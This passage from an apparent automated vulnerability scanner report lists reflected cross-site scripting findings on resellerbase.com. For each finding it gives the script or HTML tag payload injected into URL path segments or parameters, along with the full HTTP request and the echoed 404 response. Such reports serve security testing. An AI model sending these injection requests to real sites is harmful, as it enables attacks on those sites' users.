X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service45a44<script>alert(1)</script>79c5e2b46dc/web-hosting/themes/kosmos/images/review/5.gif was not found on this server.</p>
...[SNIP]...

2.5591. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/review/5.gif [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/web-hosting/themes/kosmos/images/review/5.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 48549<script>alert(1)</script>27c5732373c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/web-hosting48549<script>alert(1)</script>27c5732373c/themes/kosmos/images/review/5.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:50:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting48549<script>alert(1)</script>27c5732373c/themes/kosmos/images/review/5.gif was not found on this server.</p>
...[SNIP]...

2.5592. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/review/5.gif [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/web-hosting/themes/kosmos/images/review/5.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload c29e4<script>alert(1)</script>20fd1b9a54 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/web-hosting/themesc29e4<script>alert(1)</script>20fd1b9a54/kosmos/images/review/5.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:50:22 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/themesc29e4<script>alert(1)</script>20fd1b9a54/kosmos/images/review/5.gif was not found on this server.</p>
...[SNIP]...

2.5593. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/review/5.gif [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/web-hosting/themes/kosmos/images/review/5.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 16a7b<script>alert(1)</script>d612295e8b8 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/web-hosting/themes/kosmos16a7b<script>alert(1)</script>d612295e8b8/images/review/5.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:50:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/themes/kosmos16a7b<script>alert(1)</script>d612295e8b8/images/review/5.gif was not found on this server.</p>
...[SNIP]...

2.5594. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/review/5.gif [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/web-hosting/themes/kosmos/images/review/5.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 47f8d<script>alert(1)</script>8e39fb477e9 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/web-hosting/themes/kosmos/images47f8d<script>alert(1)</script>8e39fb477e9/review/5.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:50:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/themes/kosmos/images47f8d<script>alert(1)</script>8e39fb477e9/review/5.gif was not found on this server.</p>
...[SNIP]...

2.5595. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/review/5.gif [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/web-hosting/themes/kosmos/images/review/5.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload e2588<script>alert(1)</script>6c5914d42a0 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/web-hosting/themes/kosmos/images/reviewe2588<script>alert(1)</script>6c5914d42a0/5.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:50:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/themes/kosmos/images/reviewe2588<script>alert(1)</script>6c5914d42a0/5.gif was not found on this server.</p>
...[SNIP]...

2.5596. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/review/5.gif [REST URL parameter 7] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/web-hosting/themes/kosmos/images/review/5.gif

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 58d13<script>alert(1)</script>d08dc9904e6 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/web-hosting/themes/kosmos/images/review/5.gif58d13<script>alert(1)</script>d08dc9904e6 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:51:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/themes/kosmos/images/review/5.gif58d13<script>alert(1)</script>d08dc9904e6 was not found on this server.</p>
...[SNIP]...

2.5597. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/review/5.gif [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/web-hosting/themes/kosmos/images/review/5.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 5374c<script>alert(1)</script>1362c746fa2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/web-hosting/themes/kosmos/images/review/5.gif?5374c<script>alert(1)</script>1362c746fa2=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:49:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/themes/kosmos/images/review/5.gif?5374c<script>alert(1)</script>1362c746fa2=1 was not found on this server.</p>
...[SNIP]...

2.5598. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/review/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/web-hosting/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8792b<script>alert(1)</script>8b6497fd47c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service8792b<script>alert(1)</script>8b6497fd47c/web-hosting/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:49:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service8792b<script>alert(1)</script>8b6497fd47c/web-hosting/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5599. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/review/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/web-hosting/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload edc45<script>alert(1)</script>0cc8365c8eb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/web-hostingedc45<script>alert(1)</script>0cc8365c8eb/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:50:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hostingedc45<script>alert(1)</script>0cc8365c8eb/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5600. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/review/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/web-hosting/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 83428<script>alert(1)</script>e76d57ab655 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/web-hosting/themes83428<script>alert(1)</script>e76d57ab655/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:50:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/themes83428<script>alert(1)</script>e76d57ab655/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5601. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/review/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/web-hosting/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload e723d<script>alert(1)</script>2280f5d515d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/web-hosting/themes/kosmose723d<script>alert(1)</script>2280f5d515d/images/review/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:50:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/themes/kosmose723d<script>alert(1)</script>2280f5d515d/images/review/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5602. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/review/search.php [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/web-hosting/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 52c4e<script>alert(1)</script>a1c3d315ecb was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/web-hosting/themes/kosmos/images52c4e<script>alert(1)</script>a1c3d315ecb/review/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:50:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/themes/kosmos/images52c4e<script>alert(1)</script>a1c3d315ecb/review/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5603. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/review/search.php [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/web-hosting/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload ce485<script>alert(1)</script>a2a3b086d6d was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/web-hosting/themes/kosmos/images/reviewce485<script>alert(1)</script>a2a3b086d6d/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:50:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/themes/kosmos/images/reviewce485<script>alert(1)</script>a2a3b086d6d/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5604. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/review/search.php [REST URL parameter 7] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/web-hosting/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 6283a<script>alert(1)</script>134b4443e54 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/web-hosting/themes/kosmos/images/review/search.php6283a<script>alert(1)</script>134b4443e54?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:51:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/themes/kosmos/images/review/search.php6283a<script>alert(1)</script>134b4443e54?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5605. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/review/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/web-service/web-hosting/themes/kosmos/images/review/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 7068a<a>aef85ec6694 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /web-service/web-hosting/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search7068a<a>aef85ec6694&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:47:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search7068a<a>aef85ec6694&opt=2 was not found on this server.</p>
...[SNIP]...

2.5606. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/review/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/web-service/web-hosting/themes/kosmos/images/review/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 267df<a>ea62005dcd4 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /web-service/web-hosting/themes/kosmos/images/review/search.php?keyword=search...267df<a>ea62005dcd4&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:47:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/themes/kosmos/images/review/search.php?keyword=search...267df<a>ea62005dcd4&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5607. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/review/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/web-hosting/themes/kosmos/images/review/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 2e707<script>alert(1)</script>4a9181f29fe was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/web-hosting/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2&2e707<script>alert(1)</script>4a9181f29fe=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:49:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2&2e707<script>alert(1)</script>4a9181f29fe=1 was not found on this server.</p>
...[SNIP]...

2.5608. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/review/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/web-service/web-hosting/themes/kosmos/images/review/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 9b8e3<a>de3f150613b was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /web-service/web-hosting/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=29b8e3<a>de3f150613b HTTP/1.1
Host: www.resellerbase.com
Accept: */*
